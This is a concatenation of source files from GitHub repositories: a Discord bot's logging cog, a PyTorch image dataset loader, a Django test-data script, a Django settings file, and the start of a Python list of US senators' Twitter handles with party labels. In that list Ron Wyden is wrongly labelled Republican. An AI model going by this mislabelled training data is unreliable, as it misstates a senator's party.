value=f'{after.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.embeds != after.embeds:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} in channel <#{before.channel.id}> has had embeds updated {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Embeds updated\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.pinned != after.pinned:\n if after.pinned:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just pinned. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Pinned\", icon_url=\"https://cdn.icon-icons.com/icons2/317/PNG/512/pin-icon_34381.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just unpinned. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message Un-pinned\", icon_url=\"https://cdn.icon-icons.com/icons2/317/PNG/512/pin-icon_34381.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.flags.crossposted != after.flags.crossposted:\n if after.flags.crossposted:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just published. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message published\", icon_url=\"https://cdn.icon-icons.com/icons2/795/PNG/512/1-33_icon-icons.com_65689.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> was just un-published. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message un-published\", icon_url=\"https://cdn.icon-icons.com/icons2/795/PNG/512/1-33_icon-icons.com_65689.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n if before.flags.suppress_embeds != after.flags.suppress_embeds:\n if after.flags.suppress_embeds:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has just had it\\'s embeds suppressed. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message embeds suppressed\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n else:\n hits += 1\n embedVar = discord.Embed(title=f'A message by {before.author}', description=f'A message sent by {before.author.mention} In Channel <#{before.channel.id}> has just had it\\'s embeds un-suppressed. {after.jump_url}', color=2575039)\n embedVar.set_author(name=\"Message embeds un-suppressed\", icon_url=\"https://cdn.icon-icons.com/icons2/909/PNG/512/embed_icon-icons.com_70979.png\")\n embedVar.set_footer(text=f'Message sent at {before.created_at}\\nMessage edited at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{before.author.avatar_url}')\n embedVar.add_field(name=\"Message:\", value=f'{before.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Send raw edit data to messageLog if it hasn't been recognized above\n if hits == 0:\n await logChannel.send(embed=unknownEmbedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_add(self, reaction, user):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} just reacted {reaction} in channel <#{reaction.message.channel.id}>. {reaction.message.jump_url}', color=65302)\n embedVar.set_author(name=\"Reaction Made\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-green_40427.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction added at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_remove(self, reaction, user):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(user.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {user}', description=f'{user.mention} just un-reacted {reaction} in channel <#{reaction.message.channel.id}>. {reaction.message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reaction Removed\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction removed at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{user.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n @commands.Cog.listener()\n async def on_reaction_clear(self, message, reactions):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {message.author}', description=f'A message by {message.author.mention} in channel <#{reactions[0].message.channel.id}> has just had all reactions cleared. {reactions[0].message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reactions Cleared\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reactions[0].message.created_at}\\nReactions cleared at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{message.author.avatar_url}')\n for reaction in reactions:\n embedVar.add_field(name=f'Reaction {reaction} removed', value=f'This reaction was reacted {reaction.count} time(s)', inline=False)\n embedVar.add_field(name=\"Message contents:\", value=f'{reactions[0].message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Split between #reaction-log and #restrict-reaction-log\n # I have no idea how to trigger this. Maybe it is deprecated?\n @commands.Cog.listener()\n async def on_reaction_clear_emoji(self, reaction):\n logChannel = self.client.get_channel(reactionLogID)\n result = self.checkIfRestricted(reaction.message.author.roles)\n if result == 0:\n logChannel = self.client.get_channel(restrictReactionLogID)\n embedVar = discord.Embed(title=f'User {reaction.me}', description=f'{reaction.me.mention} just got {reaction} cleared in channel <#{reaction.message.channel.id}>. {reaction.message.jump_url}', color=16714507)\n embedVar.set_author(name=\"Reaction Cleared\", icon_url=\"https://cdn.icon-icons.com/icons2/402/PNG/512/trafficlight-red_40428.png\")\n embedVar.set_footer(text=f'Message sent at {reaction.message.created_at}\\nReaction cleared at {datetime.utcnow()}')\n embedVar.set_thumbnail(url=f'{reaction.me.avatar_url}')\n embedVar.add_field(name=\"Message contents:\", value=f'{reaction.message.content}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n embedVar = None\n if isinstance(channel, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {channel.name}', description=f'Category #{channel.name} was just deleted.', color=16714507)\n elif isinstance(channel, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{channel.name}', description=f'Text Channel #{channel.name} was just deleted.', color=16714507)\n elif isinstance(channel, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{channel.name}', description=f'Voice #{channel.name} was just deleted.', color=16714507)\n else:\n embedVar = discord.Embed(title=f'Unknown type of Channel #{channel.name}', description=f'Unknown Channel type #{channel.name} was just deleted.', color=16714507)\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel Deleted\", icon_url=\"https://cdn.icon-icons.com/icons2/1808/PNG/512/trash-can_115312.png\")\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nChannel deleted at {datetime.utcnow()}')\n embedVar.add_field(name=\"Channel Category:\", value=f'{channel.category}', inline=False)\n embedVar.add_field(name=\"Channel Position:\", value=f'{channel.position}', inline=False)\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_create(self, channel):\n embedVar = None\n if isinstance(channel, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {channel.name}', description=f'Category {channel.mention} was just created.', color=65302)\n elif isinstance(channel, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{channel.name}', description=f'Text Channel {channel.mention} was just created.', color=65302)\n elif isinstance(channel, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{channel.name}', description=f'Voice {channel.mention} was just created.', color=65302)\n else:\n return\n\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel created\", icon_url=\"https://cdn.icon-icons.com/icons2/1358/PNG/512/if-advantage-creation-1034354_88852.png\")\n embedVar.add_field(name=\"Channel Category:\", value=f'{channel.category}', inline=False)\n embedVar.add_field(name=\"Channel Position:\", value=f'{channel.position}', inline=False)\n perms = self.getChannelPerms(channel.overwrites)\n for perm in perms:\n if perm[1] == \"\":\n embedVar.add_field(name=f'{perm[0]}', value=f'No overwrites', inline=False)\n else:\n embedVar.add_field(name=f'{perm[0]}', value=f'{perm[1]}', inline=False)\n hit = 0\n async for entry in channel.guild.audit_logs(action=discord.AuditLogAction.channel_create):\n try:\n print('{0.user} created channel {0.target}'.format(entry))\n if entry.target == channel:\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nResponsible User: {entry.user}')\n hit = 1\n break\n except:\n pass\n if hit == 0:\n embedVar.set_footer(text=f'Channel created at {channel.created_at}\\nResponsible User: Unknown')\n\n await logChannel.send(embed=embedVar)\n\n # Log to #channel-log\n @commands.Cog.listener()\n async def on_guild_channel_update(self, before, after):\n if isinstance(after, discord.CategoryChannel):\n embedVar = discord.Embed(title=f'Category {after.name}', description=f'Category {after.mention} was just updated.', color=2575039)\n elif isinstance(after, discord.TextChannel):\n embedVar = discord.Embed(title=f'Text Channel #{after.name}', description=f'Text Channel {after.mention} was just updated.', color=2575039)\n elif isinstance(after, discord.VoiceChannel):\n embedVar = discord.Embed(title=f'Voice Channel #{after.name}', description=f'Voice {after.mention} was just updated.', color=2575039)\n else:\n return\n logChannel = self.client.get_channel(channelLogID)\n embedVar.set_author(name=\"Channel updated\", icon_url=\"https://cdn.icon-icons.com/icons2/1381/PNG/512/systemsoftwareupdate_94333.png\")\n embedVar.set_footer(text=f'Channel updated at {datetime.utcnow()}\\nChannel created at {before.created_at}')\n # bitrate, category, name, NSFW, permissions, permissions_synced, position, rtc_region, slowmode, topic, type, and user_limit can all be tracked\n # Type only works for text channels, we cannot difference voice vs staging yet\n # Cannot check if forced video quality is changed either\n\n # bitrate\n try:\n if before.bitrate != after.bitrate:\n embedVar.add_field(name=\"Channel bitrate has been updated\", value=f'Before: {before.bitrate}\\nAfter: {after.bitrate}', inline=False)\n except:\n pass\n\n # category\n try:\n if before.category != after.category:\n embedVar.add_field(name=\"Channel category changed\", value=f'Before: {before.category}\\nAfter: {after.category}', inline=False)\n except:\n pass\n\n # name\n try:\n if before.name != after.name:\n embedVar.add_field(name=\"Channel name changed\", value=f'Before: {before.name}\\nAfter: {after.name}', inline=False)\n except:\n pass\n\n # is_nsfw()\n try:\n if before.is_nsfw() != after.is_nsfw():\n embedVar.add_field(name=\"Channel NSFW marking changed\", value=f'Before: {before.is_nsfw()}\\nAfter: {after.is_nsfw()}', inline=False)\n except:\n pass\n\n # overwrites\n try:\n if before.overwrites != after.overwrites:\n embedVar.add_field(name=\"Channel permissions changed\", value=f'Before: {before.bitrate}\\nAfter: {after.bitrate}', inline=False)\n # perms = self.getChannelPerms(channel.overwrites)\n except:\n pass\n\n # permissions_synced\n try:\n if before.permissions_synced != after.permissions_synced:\n embedVar.add_field(name=\"Channel synced permission status has changed\", value=f'Before: {before.permissions_synced}\\nAfter: {after.permissions_synced}', inline=False)\n except:\n pass\n\n # position\n try:\n if before.position != after.position:\n embedVar.add_field(name=\"Channel position has changed\", value=f'Before: {before.position}\\nAfter: {after.position}', inline=False)\n except:\n pass\n\n # rtc_region\n try:\n if before.rtc_region != after.rtc_region:\n embedVar.add_field(name=\"Channel region has changed\", value=f'Before: {before.rtc_region}\\nAfter: {after.rtc_region}', inline=False)\n except:\n pass\n\n # slowmode_delay\n try:\n if before.slowmode_delay != after.slowmode_delay:\n embedVar.add_field(name=\"Channel slowmode has changed\", value=f'Before: {before.slowmode_delay}\\nAfter: {after.slowmode_delay}', inline=False)\n except:\n pass\n\n # topic\n try:\n if before.topic != after.topic:\n embedVar.add_field(name=\"Channel topic has changed\", value=f'Before: {before.topic}\\nAfter: {after.topic}', inline=False)\n except:\n pass\n\n # type\n try:\n if before.type != after.type:\n embedVar.add_field(name=\"Channel type has changed\", value=f'Before: {before.type}\\nAfter: {after.type}', inline=False)\n except:\n pass\n\n # user_limit\n try:\n if before.user_limit != after.user_limit:\n embedVar.add_field(name=\"Voice channel max users updated\", value=f'Before: {before.user_limit}\\nAfter: {after.user_limit}', inline=False)\n except:\n pass\n\n await logChannel.send(embed=embedVar)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n if not member.bot:\n logChannel = self.client.get_channel(memberLogID)\n await logChannel.send(f'{member} has joined the server.')\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n if not member.bot:\n logChannel = self.client.get_channel(memberLogID)\n await logChannel.send(f'{member} has left the server.')\n\n\ndef setup(client):\n client.add_cog(logs(client))\n","repo_name":"HackUCF/DiscordBot","sub_path":"cogs/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":35990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20257294507","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom skimage import io\n\n\nclass DatasetGenerator(Dataset):\n\n def __init__(self, formulas_file, root_dir, data_name,\n vocab_file, transform=None,):\n \"\"\"\n Args:\n formulas_file (String): Path to the formulas file\n root_dir (String): Directory with all the images in png format\n data_name (String): name of data split [train, test, validate]\n \"\"\"\n self.formulas = open(formulas_file, 'r').read().split('\\n')[:-1]\n self.root_dir = root_dir\n self.transform = transform\n self.data_name = data_name\n self.vocab_file = open(vocab_file, 'r').read().split('\\n')[:-1]\n\n def __len__(self):\n return len(self.formulas)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = os.path.join(self.root_dir, \"{}.png\".format(idx))\n\n image = io.imread(img_name) / 255.\n\n formula = self.formulas[idx]\n\n if self.transform:\n image = self.transform(image)\n\n sample = {'image': image, 'formula': formula}\n \n return sample\n","repo_name":"knarfamlap/img2latex","sub_path":"model/dataset_generator.py","file_name":"dataset_generator.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33908250894","text":"\n# populates database with test information\n\nfrom projects.models import Project \nfrom categories.models import Category, Group\nfrom random import randint\nfrom datetime import datetime\n\n\n# alphabet\nalpha = []\nbegin = ord('a')\nend = ord('z')\nfor num in xrange(begin, end + 1):\n\talpha.append(chr(num))\n\n# 10 groups '(0-9) group'\nfor num in range(10):\n\tgroup_name = '{0} group'.format(num)\n\tg = Group(name = group_name)\n\tg.save()\n\n# 52 categories '(A-Z) category'\n\nfor letter in alpha:\n\tgroup_num = randint(0,9)\n\tgroup_name = str(group_num) + ' group'\n\tgroup = Group.objects.get(name = group_name)\n\tcategory_name = '{0} category'.format(letter.upper())\n\tc = Category(name = category_name, group = group)\n\tc.save()\n\nfor num in range(2):\n\tfor letter in alpha:\n\t\tcat_letter = alpha[randint(0,25)].upper()\n\t\tcat_name = cat_letter + ' category'\n\t\tcategory = Category.objects.get(name = cat_name)\n\t\tif num == 0:\n\t\t\tproj_name = letter + ' project'\n\t\telse:\n\t\t\tproj_name = letter.upper() + ' project'\n\t\trating = randint(0,100)\n\t\tp = Project(\n\t\t\t\tname \t\t\t\t= proj_name,\n\t\t\t\tgithub_repo\t\t\t= \"wulfebw/api_test\",\n\t\t\t\tcategory\t\t\t= category,\n\t\t\t\trating\t\t\t\t= rating,\n\t\t\t\tdescription \t\t= \"desc\",\n\t\t\t\twebsite_url \t\t= \"http://www.google.com\",\n\t\t\t\tdocumentation_url \t= \"http://www.google.com\",\n\t\t\t\tbug_tracker_url\t\t= \"http://www.google.com\",\n\t\t\t\tmailing_list_url\t= \"http://www.google.com\",\n\t\t\t\tgithub_contributors\t= 2,\n\t\t\t\tgithub_watchers\t\t= 3,\n\t\t\t\tgithub_forks\t\t= 4,\n\t\t\t\tgithub_issues\t\t= 5,\n\t\t\t\tlast_commit_date\t= datetime.now(),\n\t\t\t\tfirst_commit_date\t= datetime.now(),\n\t\t\t\t)\n\t\tp.save()\n\n\n\n","repo_name":"wulfebw/OpenSourceHealth","sub_path":"pop_db.py","file_name":"pop_db.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33285362492","text":"import os\n\nimport typing as tp\n\nfrom pathlib import Path\n\nfrom datetime import timedelta\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', default='123') # type: ignore\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(int(os.environ.get('DEBUG', default=0))) # type: ignore\n\n# MANAGEMENT HOSTS AND CORS\nALLOWED_HOSTS: tp.List[str] = os.environ.get('ALLOWED_HOSTS', default='').split(',') # type: ignore\nCSRF_TRUSTED_ORIGINS: tp.List[str] = os.environ.get('CSRF_TRUSTED_ORIGINS', default='').split(',') # type: ignore\nCORS_ORIGIN_ALLOW_ALL = bool(int(os.environ.get('CORS_ORIGIN_ALLOW_ALL', default=0))) # type: ignore\nif not CORS_ORIGIN_ALLOW_ALL:\n CORS_ALLOWED_ORIGINS = os.environ.get('CORS_ALLOWED_ORIGINS').split(',') # type: ignore\nCORS_ALLOW_CREDENTIALS = True\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'corsheaders',\n\n 'rest_framework',\n\n 'drf_yasg',\n\n 'api.authenticate',\n 'api.master',\n 'api.order',\n 'api.telegram_bot',\n 'api.account',\n 'api.payments',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'ommy_polland.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, \"templates\")],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'ommy_polland.wsgi.application'\n\n# Database\nSQL_ENGINE = os.environ.get(\"SQL_ENGINE\", default=\"django.db.backends.sqlite3\") # type: ignore\nSQL_DATABASE = os.environ.get(\"SQL_DATABASE\", default=os.path.join(BASE_DIR, \"db.sqlite3\")) # type: ignore\nSQL_USER = os.environ.get(\"SQL_USER\", default=\"user\") # type: ignore\nSQL_PASSWORD = os.environ.get(\"SQL_PASSWORD\", default=\"password\") # type: ignore\nSQL_HOST = os.environ.get(\"SQL_HOST\", default=\"localhost\") # type: ignore\nSQL_PORT = os.environ.get(\"SQL_PORT\", default=\"5432\") # type: ignore\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": SQL_ENGINE,\n \"NAME\": SQL_DATABASE,\n \"USER\": SQL_USER,\n \"PASSWORD\": SQL_PASSWORD,\n \"HOST\": SQL_HOST,\n \"PORT\": SQL_PORT,\n }\n}\n\n# Password validation\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# REST FRAMEWORK settings\nREST_FRAMEWORK = {\n 'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema',\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'DEFAULT_PERMISSIONS_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n 'DEFAULT_PARSER_CLASSES': (\n 'rest_framework.parsers.JSONParser',\n ),\n 'PAGE_SIZE': 20,\n}\n\n# SIMPLE JWT SETTINGS\nACCESS_TOKEN_LIFETIME = int(os.environ.get('ACCESS_TOKEN_LIFETIME', 20))\nREFRESH_TOKEN_LIFETIME = int(os.environ.get('REFRESH_TOKEN_LIFETIME', 60))\nALGORITHM = os.environ.get('ALGORITHM')\nAUTH_HEADER_TYPES = os.environ.get('AUTH_HEADER_TYPES')\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=ACCESS_TOKEN_LIFETIME),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=REFRESH_TOKEN_LIFETIME),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': ALGORITHM,\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': (AUTH_HEADER_TYPES,),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# CREDENTIALS FOR DEFAULT SUPERUSER\nDEFAULT_SUPER_USER_USERNAME = os.environ.get('DEFAULT_SUPER_USER_USERNAME') # type: ignore\nDEFAULT_SUPER_USER_PASSWORD = os.environ.get('DEFAULT_SUPER_USER_PASSWORD') # type: ignore\nDEFAULT_SUPER_USER_EMAIL = os.environ.get('DEFAULT_SUPER_USER_EMAIL') # type: ignore\n\n# SET CUSTOM USER MODEL\nAUTH_USER_MODEL = 'account.User'\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = os.environ.get('TIME_ZONE', default='Europe/Moscow') # type: ignore\n\nCELERY_TIME_ZONE = os.environ.get('TIME_ZONE', default='Europe/Moscow') # type: ignore\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# REDIS\nREDIS_HOST = os.environ.get('REDIS_HOST') # type: ignore\nREDIS_PORT = os.environ.get('REDIS_PORT') # type: ignore\n\n# CELERY\nCELERY_BROKER_URL = f'redis://{REDIS_HOST}:{REDIS_PORT}/0' # type: ignore\nCELERY_BROKER_TRANSPORT_OPTIONS = {'visibility_timeout': 3600}\nCELERY_RESULT_BACKEND = f'redis://{REDIS_HOST}:{REDIS_PORT}/0' # type: ignore\n\n# TELEGRAM SETTINGS\nBOT_TOKEN = os.environ.get('BOT_TOKEN') # type: ignore\nORDER_CHAT_ID = os.environ.get('ORDER_CHAT_ID') # type: ignore\nADMINS_CHAT_IDS = os.environ.get('ADMINS', default='').split(',') # type: ignore\n\n# AWS\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') # type: ignore\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') # type: ignore\nORDER_BUCKET = os.environ.get('ORDER_BUCKET') # type: ignore\nBUCKET_REGION = os.environ.get('BUCKET_REGION') # type: ignore\n\n# TWILIO\nTWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID') # type: ignore\nTWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN') # type: ignore\nTWILIO_PHONE_NUMBER = os.environ.get('TWILIO_PHONE_NUMBER') # type: ignore\n\n# GOOGLE SHEETS\nSHEET = os.environ.get('SHEET')\nORDER_WORK_SHEET = os.environ.get('ORDER_WORK_SHEET')\nMASTER_WORK_SHEET = os.environ.get('MASTER_WORK_SHEET')\n\n# STATIC FILES\nSTATIC_URL = \"/staticfiles/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\n\n# MEDIA FILES\nMEDIA_URL = \"/mediafiles/\"\nMEDIA_ROOT = os.path.join(BASE_DIR, \"mediafiles\")\n\n# Default primary key field type\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n","repo_name":"xal9wiii4ik/ommy_poland","sub_path":"app/ommy_polland/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21964406170","text":"# screen_names.py\n# Contains lists of users' screen names used for training data\n\n# List of pairs of screen names and part label for US senators\nsenators = [\n # Republicans\n ('SenatorStrange', 'R'), # Luther Strange (R-AL)\n ('SenJohnKennedy', 'R'), # John N. Kenendy (R-LA)\n ('SenThomTillis', 'R'), # Thom Tillis (R-NC)\n ('SenSasse', 'R'), # Ben Sasse (R-NE)\n ('SenatorRounds', 'R'), # Mike Rounds (R-SD)\n ('SenDanSullivan', 'R'), # Dan Sullivan (R-AK)\n ('sendavidperdue', 'R'), # David Perdue (R-GA)\n ('SenJoniErnst', 'R'), # Joni Ernst (R-IA)\n ('SenateMajLdr', 'R'), # Mitch McConnell (R-KY) (Majority Leader)\n ('SenatorRisch', 'R'), # Jim Risch (R-ID)\n ('SenTedCruz', 'R'), # Ted Cruz (R-TX)\n ('SenatorFischer', 'R'), # Deb Fischer (R-NE)\n ('SenTomCotton', 'R'), # Tom Cotton (R-AR)\n ('MikeCrapo', 'R'), # Mike Crapo (R-ID)\n ('SenThadCochran', 'R'), # Thad Cochran (R-MS)\n ('LindseyGrahamSC', 'R'), # Lindsey Graham (R-SC)\n ('SenJohnHoeven', 'R'), # John Hoeven (R-ND)\n ('SenJohnThune', 'R'), # John Thune (R-SD)\n ('SenatorEnzi', 'R'), # Mike Enzi (R-WY)\n ('SenDeanHeller', 'R'), # Dean Heller (R-NV)\n ('SenatorWicker', 'R'), # Roger Wicker (R-MS)\n ('senorrinhatch', 'R'), # Orrin Hatch (R-UT)\n ('RonWyden', 'R'), # Ron Wyden (R-OR)\n ('SenCoryGardner', 'R'), # Cory Gardner (R-CO)\n ('SenToddYoung', 'R'), # Todd Young (R-IN)\n ('SenRonJohnson', 'R'), # Ron Johnson (R-WI)\n ('SenatorLankford', 'R'), # James Lankford (R-OK)\n ('SenToomey', 'R'), # Pat Toomey (R-PA)\n ('SenatorTimScott', 'R'), # Tim Scott (R-SC)\n ('RandPaul', 'R'), # Rand Paul (R-KY)\n ('SenJohnBarrasso', 'R'), # John Barrasso (R-WY)\n ('SenCapito', 'R'), # Shelley Moore Capito (R-WV)\n ('SenatorIsakson', 'R'), # Johnny Isakson (R-GA)\n ('SenAlexander', 'R'), # Lamar Alexander (R-TN)\n ('SenPatRoberts', 'R'), # Pat Roberts (R-KS)\n ('SenBobCorker', 'R'), # Bob Corker 